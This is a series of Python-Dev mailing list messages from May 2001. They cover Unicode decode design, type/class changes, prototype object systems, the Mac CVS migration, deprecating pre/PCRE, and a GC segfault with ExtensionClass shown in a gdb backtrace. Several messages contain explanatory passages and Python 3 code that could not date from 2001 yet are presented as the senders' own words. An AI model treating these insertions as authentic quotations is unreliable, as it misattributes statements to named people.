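assert codecs.encode("Hello", "rot13") == "Uryyb"
assert codecs.decode("Uryyb", "rot13") == "Hello"
```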

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@effbot.org  Fri May 11 10:43:14 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:

> > I may be being dense, but can you explain what's going on here:
> > 
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "<input>", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again?  shouldn't michael's example be
equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead
of just buggy...

Cheers /F


From mal@lemburg.com  Fri May 11 10:50:24 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
> 
> barry wrote:
> 
> > Great interview with Mark on the ORA site, linked from /.
> >
> >     http://python.oreilly.com/news/python_0501.html
> 
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
> 
>     http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy
and was wondering how to get AvantGo (the channel software that
comes with it) to synchronize with your daily URL... wouldn't it
be possible to set up a channel for this? The AvantGo channels
can be registered at their site (http://www.avantgo.com), but the
contents would have to be "mobile friendly"... anyway, just a 
thought ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 11 11:07:40 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "<input>", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
> 
> can you take that again?  shouldn't michael's example be
> equivalent to:
> 
>     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> 
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that 
PyString_Encode() and PyString_Decode() guarantee the returned
object to be a string object. To be able to reuse Unicode codecs
I added code which converts Unicode back to a string in case the
codec returns a Unicode object (which the .decode() method does).
This is what's failing.

Perhaps I should simply remove the restriction and have both
APIs return the codec's return object as-is ?! (I would be in
favour of this, but I'm not sure whether this is already in use 
by someone...)
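The failure MAL describes can be reproduced with a small model. First decode with the Unicode codec, then force the result back into an 8-bit string using the default ASCII encoding. Both helper names below are hypothetical stand-ins for the C-level `PyString_Decode()` behaviour. The sketch is written in modern Python, where `bytes` and `str` play the roles of the old string and Unicode types.

```python
def decode_coerced(data, encoding):
    """Model of the old behaviour: the result must come back as 8-bit data."""
    text = data.decode(encoding)       # the Unicode codec does the real work
    return text.encode("ascii")        # implicit coercion back to a string


def decode_as_is(data, encoding):
    """MAL's proposal: hand back whatever the codec returned."""
    return data.decode(encoding)


raw = "\u00e3".encode("latin-1")        # b'\xe3'

try:
    decode_coerced(raw, "latin-1")
    coerced_ok = True
except UnicodeError:                    # UnicodeEncodeError is a subclass
    coerced_ok = False

assert not coerced_ok
assert decode_as_is(raw, "latin-1") == "\u00e3"
```

Returning the codec's result unchanged gives Fredrik's expected equivalence with `unicode(s, "latin-1")`.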

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Fri May 11 14:31:18 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST."
 <200105110157.UAA03123@cj20424-a.reston1.va.home.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>
 <200105110157.UAA03123@cj20424-a.reston1.va.home.com>
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point.  Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes.  I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.  

Alas, I think I'll have to withdraw this promise for now.  The truly
built-in types are static objects that are shared between all
interpreter instances within one process, and each type has only one
dictionary pointer.  So changes to the __dict__ would affect other
interpreter instances, and that's unacceptable.

I've thought about alternatives; I can't give each interpreter its own
set of types because sometimes objects are shared between interpreters
(e.g. the dictionary of interned strings), and then their types
have to be shared too!  Not having any object sharing would mean too
much of a change to the foundations of the implementation.

I think we'll have to live with this restriction until Python 3000.
Personally, I don't mind -- I see mostly possible abuses for the
ability to change attributes of e.g. DictType or StringType. :-)
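The restriction Guido settles on is still visible today. Attributes of the static built-in types cannot be assigned, while classes derived from them (heap-allocated per class statement, not shared statically) accept new attributes. The following is a minimal check in modern Python. The exact error message differs between versions, so only the exception type is relied on.

```python
try:
    dict.annotation = "shared by every interpreter"   # static built-in type
    builtin_type_writable = True
except TypeError:
    builtin_type_writable = False


class MyDict(dict):
    pass


MyDict.annotation = "only affects this heap-allocated subclass"

assert not builtin_type_writable
assert MyDict.annotation.startswith("only")
assert not hasattr(dict, "annotation")
```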

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g@Virginia.EDU  Fri May 11 14:43:32 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105110919490.501-100000@localhost>


Catching up on this thread -- mostly because it looks like I'm
going to have to use ExtensionClass to make pyobjc classes into
python classes rather than types -- you can add that to the 
list of real-world uses of Don's Metaclass hack that Tim
questioned. 

 Reading up on MetaClasses in Smalltalk again makes me appreciate
the simplicity of a prototype system where everything is just
an object -- all objects can be cloned, and some objects are 
only used for cloning -- they are the exemplars of their type
which fill the role of Classes. 

 Unfortunately, although prototypes would be a lot simpler, it 
would be a pretty incompatible change for Python -- I can't think
of any way to get there without a lot of breakage. 

 (Still -- I wonder if there's a way they could be used under
the covers in the implementation to make it simpler. Prototype
semantics are basically a superset of Class based semantics, which
is how it was easy to do Smalltalk in Self.)
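Here is the prototype idea in concrete form. Objects hold their own slots and delegate failed lookups to a parent, and "classes" are just exemplar objects that others are cloned from. This is a toy sketch in Python. `Proto` and `clone` are invented for illustration and say nothing about how Python itself is implemented.

```python
class Proto:
    """A toy prototype object: own slots plus delegation to a parent."""

    def __init__(self, parent=None, **slots):
        self._parent = parent
        self.__dict__.update(slots)

    def __getattr__(self, name):
        # Called only when normal lookup fails: delegate to the parent chain.
        parent = self.__dict__["_parent"]
        if parent is None:
            raise AttributeError(name)
        return getattr(parent, name)

    def clone(self, **slots):
        """Make a new object that inherits from self and overrides some slots."""
        return Proto(parent=self, **slots)


# An exemplar plays the role of a class...
point = Proto(x=0, y=0, describe=lambda p: "(%s, %s)" % (p.x, p.y))
# ...and "instances" are clones of it.
p = point.clone(x=3)

assert p.x == 3 and p.y == 0          # y is delegated to the exemplar
assert p.describe(p) == "(3, 0)"      # slots holding functions are not bound
point.y = 5                           # changing the exemplar...
assert p.y == 5                       # ...is visible through delegation
```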

 Classes are necessary for statically typed O-O languages, but 
IMHO, make a lot less sense for dynamic languages. If Py3K were
to be a clean start, I'd urge basing it on prototypes, but as
an incremental change -- I don't know how to get there from 
here (unless it could sneak in under the implementation covers!)


 BTW: XlispStat, which has a prototype object system with multiple
inheritance also doesn't have "super" -- there is a 
(call-next-method [ args... ]) function/macro which searches
 the base classes for the next method. I'm sure there's a lower-level function to 
 just get the next method, but typically, call-next-method is
 what's used. There is no search for non-method attributes, as
 all of the base class instance vars are merged and made into
 slots of the instance itself. (There are no class variables -- 
 there are no classes.) 

 The closest python equivalent would be, as has been discussed
in this thread, a  super method or function that does attribute
 lookup on the bases. 
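A `super`-like function that "does attribute lookup on the bases" takes only a few lines. It walks the method resolution order past the current class, which is roughly what `call-next-method` does. `next_method` below is a hypothetical helper. Python's built-in `super()` does this job in C and covers more cases.

```python
def next_method(cls, instance, name):
    """Find `name` in the classes after `cls` in type(instance)'s MRO."""
    mro = type(instance).__mro__
    for klass in mro[mro.index(cls) + 1:]:
        if name in vars(klass):
            # Bind the plain function to the instance, as normal lookup would.
            return vars(klass)[name].__get__(instance, type(instance))
    raise AttributeError(name)


class A:
    def who(self):
        return ["A"]


class B(A):
    def who(self):
        return ["B"] + next_method(B, self, "who")()


class C(A):
    def who(self):
        return ["C"] + next_method(C, self, "who")()


class D(B, C):
    def who(self):
        return ["D"] + next_method(D, self, "who")()


assert D().who() == ["D", "B", "C", "A"]
```

Note that B's "next method" is C's, not A's, when called on a D instance. This cooperative behaviour is what makes a call-next-method style useful with multiple inheritance.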


-- Steve Majewski


From nas@python.ca  Fri May 11 15:06:39 2001
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply@sourceforge.net wrote:
> Module objects currently don't define the tp_getattro 
> or tp_setattro slots.  As a result, interning of 
> attribute names does them no good:  a char* is always 
> passed, so the dict lookup always needs to do a string 
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as
well.  PyObject_GetAttrString is always used.  I believe the old
code interned names like "__add__" and used PyObject_GetAttr.  Is
it worth fixing this?
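Interning matters here because an interned name is a single shared string object, so a CPython dict lookup can succeed on a pointer-identity check before comparing characters. Passing a `char*` typically means a fresh string object has to be built for the lookup, and that shortcut is lost. The Python-level effect of interning is visible through `sys.intern`. The sketch below illustrates only that effect; it does not model the C code paths Neil mentions.

```python
import sys

# Build the same text at runtime so the compiler can't share the constant.
dynamic = "".join(["__", "add", "__"])
literal = "__add__"

assert dynamic == literal
# Interning maps equal strings to one canonical object...
assert sys.intern(dynamic) is sys.intern(literal)
# ...so code holding interned names can compare them by identity.
```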

  Neil


From guido@digicool.com  Fri May 11 16:13:56 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
 <20010511070639.A1402@glacier.fnational.com>
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
 <20010511070639.A1402@glacier.fnational.com>
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well.  PyObject_GetAttrString is always used.  I believe the old
> code interned names like "__add__" and used PyObject_GetAttr.  Is
> it worth fixing this?

Maybe.  I'd give this low priority.  If my descriptor branch work goes
well, most of classobject.c *may* disappear in favor of the newly
swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jack@oratrix.nl  Fri May 11 15:29:24 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks,
the Python/Mac repository has been moved to sourceforge, and is integrated 
with the general Python repository, so from now on a single CVS tree suffices 
to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more 
weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of 
the optional libraries you need to build MacPython, but that's only if you 
want to build it completely from CVS.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From martin@loewis.home.cs.tu-berlin.de  Fri May 11 15:41:33 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is
a good thing.

It seems, however, that some of the directory structure is backwards:
Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
may be others of this kind.

I also wonder whether all these files are still needed, and meant to
be distributed. E.g. I see chdir.c having the comment

/* Chdir for the Macintosh.
   Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
   Pathnames must be Macintosh paths, with colons as separators. */

Is it really the case that the Mac API hasn't grown a chdir call in 13
years?

Regards,
Martin


From fdrake@acm.org  Fri May 11 15:55:33 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 10:55:33 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>

Martin v. Loewis writes:
 > It seems, however, that some of the directory structure is backwards:
 > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
 > may be others of this kind.

  I agree that this should be the goal; I don't know if Jack's release
procedure would need to be revised before that can happen.  If so, I'd
encourage him to do so.

 > Is it really the case that the Mac API hasn't grown a chdir call in 13
 > years?

  Yikes!  I just searched developer.apple.com for "chdir" and came up
with no hits, but I really don't know just what that tells me.
chdir() is required for POSIX compliance, but it isn't mentioned in
the C9X final committee draft.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From jack@oratrix.nl  Fri May 11 15:56:39 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:56:39 +0200
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: Message by "Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>
 ,
 Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl>

> It seems, however, that some of the directory structure is backwards:
> Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
> may be others of this kind.

Yes, now that the Mac stuff is integrated with the mainstream again this might 
be a good idea.

> I also wonder whether all these files are still needed, and meant to
> be distributed. E.g. I see chdir.c having the comment
> 
> /* Chdir for the Macintosh.
>    Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
>    Pathnames must be Macintosh paths, with colons as separators. */
> 
> Is it really the case that the Mac API hasn't grown a chdir call in 13
> years?

Hmm, hmm, I'm unsure.

MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current 
directories (by design. Whether I agree with the design is a different 
matter:-).

Normally MacPython is built with a special unix-compatibility library, GUSI, 
which does provide these calls. However, it is still possible to build without 
GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in 
its MacOS API model") I've used these compatibility routines again, until I
finally got GUSI ported.

But it's easy enough to cvs-remove them from the normal tree, to be revived 
when needed. What do people think?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From Samuele Pedroni <pedroni@inf.ethz.ch>  Fri May 11 15:56:48 2001
From: Samuele Pedroni <pedroni@inf.ethz.ch> (Samuele Pedroni)
Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST)
Subject: [Python-Dev] Type/class
Message-ID: <200105111456.QAA00228@core.inf.ethz.ch>

Hi.

> 
>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
I agree. I often read that Smalltalk is "simple" up to metaclasses;
on the other hand, the casual user can just ignore them.

>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)
> 
[Ignoring the fact that code and changes require coders]

Thinking in terms of proto-objects, parent slots and list parent slots:

a Python instance I has data slots and a parent slot __class__,

a Python class C has data slots and a list parent slot __bases__,

then we have the Python rules (not very uniform):
function from I directly => function
function from I.__class__ => bound method
function from C => unbound method

That's the difficult part for every model that aims to remain compatible.
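The three lookup rules above can be checked directly. The sketch below is written for Python 3, where the third rule has since changed: unbound methods were removed, so a function fetched from the class comes back as a plain function rather than an unbound method. The names `f`, `C`, `i` and `lookup_kinds` are illustrative only.

```python
import types

def f(self=None):
    # A plain function; whether it gets bound depends on where it is found.
    return self

class C:
    pass

C.meth = f        # stored in the class dict, reached from I via I.__class__
i = C()
i.direct = f      # stored in the instance dict

def lookup_kinds():
    """Report what kind of object each lookup path produces."""
    return {
        "from I directly": type(i.direct).__name__,   # no binding happens
        "from I.__class__": type(i.meth).__name__,    # bound method
        "from C": type(C.meth).__name__,              # 2.1: unbound method; Python 3: plain function
    }
```

Calling `i.meth()` passes `i` as `self`, while `i.direct()` passes nothing, which is exactly the non-uniformity a prototype-based model would have to reproduce.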

Samuele Pedroni.


From thomas.heller@ion-tof.com  Fri May 11 16:40:10 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Fri, 11 May 2001 17:40:10 +0200
Subject: [Python-Dev] Type/class
References: <Pine.NXT.4.21.0105110919490.501-100000@localhost>
Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>

>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)

I never looked at Self or other prototype based systems.
Is it really true that prototypes are a lot simpler than
metaclasses, but on the other hand more powerful?

The 'brain exploding properties' of metaclasses are IMO
only there because my brain cannot think easily in too
many recursion steps...

Thomas


From fdrake@acm.org  Fri May 11 17:25:54 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 12:25:54 -0400 (EDT)
Subject: [Python-Dev] status of pre?
Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>

  Have we formulated a plan of action regarding PCRE and the pre
module?  Are we planning to leave them in for another version, or is
SRE considered sufficiently stable?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From sdm7g@Virginia.EDU  Fri May 11 17:29:30 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 12:29:30 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105111130290.234-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Fred L. Drake, Jr. wrote:
> 
> Martin v. Loewis writes:
>  > Is it really the case that the Mac API hasn't grown a chdir call in 13
>  > years?
> 
>   Yikes!  I just searched developer.apple.com for "chdir" and came up
> with no hits, but I really don't know just what that tells me.
> chdir() is required for POSIX compliance, but it isn't mentioned in
> the C9X final committee draft.


 There isn't a chdir in any of the pre-OSX Mac *system* libraries, and
Mac has never claimed any POSIX compliance (even with OSX, they have
officially said it's almost certainly POSIX compliant but they have
no plans for now to go thru the hoops and paperwork to get it 
certified.) 

 chdir is in unistd.h, which isn't part of the standard C library.

 However, Metrowerks *compiler* and IDE for the Mac does include in
MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW 
selling development tools obviously has more interest in being 
POSIX compliant than Apple! )


 I don't know if there's one in the MPW libraries, so maybe you
still want to leave it there. 

 -- Steve Majewski


From guido@digicool.com  Fri May 11 19:47:38 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 13:47:38 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400."
 <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>
Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com>

>   Have we formulated a plan of action regarding PCRE and the pre
> module?  Are we planning to leave them in for another version, or is
> SRE considered sufficiently stable?

Hm.  It should disappear but I believe I've heard people say they were
forced to use it because of the recursion limit problems with SRE on
some platforms.

We could put a warning on using pre or pcre in 2.2, and remove it in
2.3, hoping that /F fixes the recursion limit problems in the mean
time (weren't those related to the backtracking implementation)?
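A "warn in 2.2, remove in 2.3" plan amounts to a module that emits a warning when it is used. A minimal sketch with the standard `warnings` module (new in 2.1), written for a modern Python 3; the helper name `warn_deprecated_module` is hypothetical, not something pre.py actually contains.

```python
import warnings

def warn_deprecated_module(name, replacement):
    """Hypothetical helper a deprecated module could call at import time."""
    warnings.warn(
        "the %s module is deprecated; use %s instead" % (name, replacement),
        DeprecationWarning,
        stacklevel=2,  # point at the caller rather than at this helper
    )

# At the top of a hypothetical deprecated pre.py one would write:
#     warn_deprecated_module("pre", "re")

def demo():
    """Capture the warning so it can be inspected."""
    with warnings.catch_warnings(record=True) as caught:
        # DeprecationWarning is hidden by default in most contexts.
        warnings.simplefilter("always")
        warn_deprecated_module("pre", "re")
    return caught
```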

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Fri May 11 21:41:30 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Fri, 11 May 2001 15:41:30 -0500
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <15100.20090.573866.569667@beluga.mojam.com>

Has anyone investigated interactions between ExtensionClass objects and GC?
I've encountered segfaults with 2.1 in certain situations when using the
latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
set using ExtensionClasses.  Any ideas how I should approach the problem?  I
don't know either piece of code at all, and the code that generates the
segfault isn't particularly small, not to mention that it uses the bleeding
edge Gtk stuff (which I doubt anyone on this list will have installed) and a
version of ExtensionClass patched by James Henstridge, the PyGtk author.

Here's what I know:

    1. Disabling gc gets rid of the segfault
    2. I only see the problem with importing a specific module that
       subclasses the GtkTextView widget from the Python command line.  If I
       run it as a script from the shell prompt, I get no segfault.
    3. If I first import the gtk module, then import my module, I get no
       segfault. 
    4. Most changes I make to the module causing the problem cause the
       problem to disappear.

All told, all this really tells me is I'm probably dealing with a
malloc/free problem of some sort.

Neil and/or Jim (and/or anyone else willing to look into this problem), I
can give you access to my development machine via ssh if you think that
would help debug the problem.

Skip

#0  0x0807163d in visit_decref (op=0x4034ece0, data=0x0)
    at ../Modules/gcmodule.c:153
#1  0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
#2  0x08071672 in subtract_refs (containers=0x80b8ac0)
    at ../Modules/gcmodule.c:167
#3  0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc)
    at ../Modules/gcmodule.c:379
#4  0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484
#5  0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507
#6  0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149
#7  0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244
#8  0x401f0979 in initializeBaseExtensionClass (self=0x4034d320)
    at ExtensionClass.c:1485
#9  0x401f6774 in export_subclassed_type (dict=0x82d33a4, 
    name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4)
    at ExtensionClass.c:3410
#10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, 
    class_name=0x40337c55 "GtkTreeViewColumn", 
    get_type=0x404c4080 <gtk_tree_view_column_get_type>, ec=0x4034d320, 
    bases=0x82ea9a4) at gobjectmodule.c:202
#11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071
#12 0x402f0ed0 in init_gtk () at gtkmodule.c:98
#13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", 
    pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52
#14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, 
    buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", 
    type=3) at ../Python/import.c:1296
#15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", 
    fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815
#16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, 
    p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc)
    at ../Python/import.c:1671
#17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, 
    locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522
#18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", 
    globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864)
    at ../Python/import.c:1563
#19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124)
    at ../Python/bltinmodule.c:31
#20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2838
#21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2801
#22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734
#23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c) at ../Python/ceval.c:346
#25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", 
    co=0x82910d0, 
    pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490
#26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754
#27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
    buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", 
    type=1) at ../Python/import.c:1287
#28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk")
    at ../Python/import.c:811
#29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, 
